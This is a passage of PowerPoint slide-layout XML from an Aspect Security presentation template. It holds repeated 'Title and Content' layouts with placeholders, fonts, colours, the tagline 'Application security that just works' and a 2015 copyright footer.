            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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29_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186702760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46F7C92-B666-BE4A-87BA-E45BF689715D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/17/2016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BE9C67AB-B614-C742-93A2-1DCA2D6D2270}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272902826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30_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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31_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
